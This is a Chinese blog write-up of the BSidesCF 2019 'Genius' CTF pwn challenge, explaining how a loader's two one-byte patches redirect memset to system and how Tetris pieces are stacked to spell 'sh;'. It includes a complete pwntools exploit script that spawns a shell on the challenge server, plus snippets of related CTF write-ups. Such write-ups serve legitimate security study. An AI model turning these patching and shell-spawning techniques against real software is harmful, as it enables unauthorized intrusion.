[BUUCTF-pwn] [BSidesCF 2019]Genius

最新推荐文章于 2022-10-27 10:01:57 发布
最新推荐文章于 2022-10-27 10:01:57 发布
阅读量288 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122824184
版权

这个题打死也作不出来,看了个英文的wp

外国弄的这东西,思路不常见。一个是Genius文件是下人俄罗斯方块游戏(出的块是固定序列)这个本身没有问题。另外一个是loader文件,这个文件把游戏文件读入内存中,并允许修改两次每次1字节(通过一种JS啥的编码取5个字节中的若干位组成偏移和修改的字节)然后运行程序。

思路:

        一是修改memset它在plt表中位置是XX30修改1字节改为XX20这个是system的plt表,以gameover的时候会调用到这个,就相当于system(XXX)了

第二个是这个参数这个参数是游戏打完形成的图形(有块为1空地为0)想办法让打完的位置形成sh;这相需要天才的脑子在适当调整偏移的情况下(偏移为+0x15),限制就是这个1不能掉下来。

        第三步就是把掉下来的块设计好路线。

from pwn import *

'''
|  ggo   fd|
|00bbo0000d|
|0bb0oo0cdd|
|00aaee cc |   <-- 0011 1011,0110 1000,0111 0011  ;hs
|  aaee c  |
+----------+
loader允许patch程序两字节:第1次将plt表memset改为system 30->20,第2次将程序中memset参1:0x804b1a0改为0x804b1B5 从指定位置开始,指定位置堆成sh;的码
然后用块堆成指定数据-1,-2,-3连起来是sh;
下落块顺序固定  O, S, T, J, O, Z, Z, T, O, Z, T, J, L
'''

#p = process('./loader')
p = remote('node4.buuoj.cn', 29973) 

context(arch='i386', log_level='debug')

p.sendlineafter(b'continue!\n', b'AZZAZT') #0x622 plt.memset FF 25 (30->20) B0 04 08
p.sendlineafter(b'Please enter your second code, or press <enter>\n', b'SLGOGI') #0x154B:push offset dword_804B1A0 ; s (68 (A0->B5)B10408) 154c
p.recvuntil(b':)\n')
val = ['as','qaas','eddds','qdddds','ds','ddddds','qaas','eaaaas','as','ddddds','edddds','aaaaas','eas']
for i in val:
    sleep(1)
    p.recv()
    p.send(i.encode())
    
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BSidesSF 2019 部分writeup
Kr的博客
03-06 2423
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
[BUUCTF-pwn] [BSidesCF 2019]StrawClutcher
weixin_52640415的博客
02-10 287
looooooooooooooooooooooooooong代码 题目说是ftp服务器,其实就是在堆里建链每个文件带固定长度数据。代码长得不可相像,比如put就得用7个分支判断(3个字母大小写和1个空格)然后再判断参数。 数据结构: 管理块:0x50 文件名:0x28, 大小:8, 数据块指针:8,8字节,下一块指针:8 数据块:长度在puts时输入 命令格式: put filename filesize 随后发送数据(长度由filesize确定) rename filena...
BUUCTF】[BSidesCF 2019]Futurella
aoao331198的博客
05-19 440
检查 拿到代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this->a;
[BSidesCF 2019]Kookie and [BSidesCF 2020]Cards
shinygod的博客
04-08 3781
知识点:cookie伪造 [BSidesCF 2019]Kookie 提示我们要以以admin身份登录,还告诉我们在cookie中,那答案呼之欲出。 在cookie中加入username=admin [BSidesCF 2020]Cards 做题目之前先了解一下21点的规则: 二十一点玩法规则和概率在二十一点游戏中,拥有最高点数的玩家获胜,其点数必须等于或低于21点;超过21点的玩家称为爆牌。 2点至10点的牌以牌面的点数来相加,J、Q、K 每张为10点。 A可记为1点或为11点,若玩家会因A而爆牌则
BUUCTF 个人做题记录【7-03】
qq_61620566的博客
07-03 1435
学习才会进步
[BSidesCF 2019]Futurella
Yb_140的博客
10-27 226
签到
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
BUUCTF:[BSidesCF 2019]Kookie
末初的CSDN博客
03-30 2054
BUUCTF:[BSidesCF 2019]Kookie 提示我们使用admin账户登录,并且存在cookie/monster两个账户? 抓包添加Cookie: username=admin即可得到flag
[BSidesCF 2019]Sequel SQLite注入~~
a3320315的博客
02-15 1428
题目描述 首先是登录,我们爆破一下就好了~~ 然后得到用户名和密码均为guest~~ 这时登录成功后会返回一个cookie,而且长得很可疑~~ set-cookie: 1337_AUTH=eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9; HttpOnly base64 解密一下得到 {"username":"guest","passwor...
题目总结 web 51-100
羽的博客
04-28 4001
0x051 [BJDCTF2020]Mark loves cat 知识点: a=b&c=d foreach($_POST as $x => $y){ echo $x; echo "</br>"; echo $y; echo "</br>"; } 将输出 a b c d 0x052[BJDCTF 2nd]Schrödinger 修改...
[BSidesSF 2019]Mixer ECB加密
a3320315的博客
02-15 1443
题目介绍 这儿需要我们登录,根据题目提示,我们需用admin登录就能拿到flag,我们先随便登录一下试试~~ 这儿返回了cookie,应该是某种加密~~ 但是题目并没有提示,尝试解码也并没有特别明显的线索,后来随便改一下user的值,发现报错,并且返回我们这儿猜测是cbc加密,因为其它的我也不知道 根据题目我们知道,解码应该为 {"first_name":"ma","last_name":"jia...
[BUUCTF][BSidesCF 2020]Cards
Y4tacker的博客
10-20 3036
前言:很久没写博客了,虽然做了好多题,太懒了,这道题单纯就一个爬虫题目 文章目录思路wp 思路 我们在每次请求都会有一个SecretState参数,用来保存游戏状态,并且在客户端和服务端同步。这个参数没法篡改。每次请求,服务端都会生成一个新的SecretState,但是旧的SecretState并不失效,问题就出在于此。 游戏如果赢了,就更新SecretState,如果输了,则不更新SecretState。这样就可以达到类似一种分数只增不减的效果。 但是有个问题,下注之后要开牌的话,必须得用新的Secret
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5326
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
[BSidesCF 2020]Hurdles
cjdgg的博客
08-24 583
[BSidesCF 2020]Hurdles 这题进入后如上图所示,按要求访问/hurdles 按要求访问方式改成put 访问路径加上/! get参数的值为flag 传入”&=&=&“之前需要对其进行url编码,得%26%3D%26%3D%26,最后加上任意值: 这里的提示是其实仔细观察可以发现是两行,所以需要让&=&=&的值等于%00(换行符),其后还包含了一个换行符,也是进行url编码,%2500进行URL解码之后就是%00,得:%2500%0
BUUCTF--[BSidesCF 2019]Sequel
qq_46263951的博客
08-16 587
进入后是一个登录页面 爆破之后的到帐号和密码都是guest 这里有个很隐晦的提示,Maybe the admin likes it too? 查看Cookie,使用base64解密 接下来使用cookie注入,使用大佬的脚本 import requests import base64 import string import sys out = "" while True: for letter in string.printable: tmp = out + lette.
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值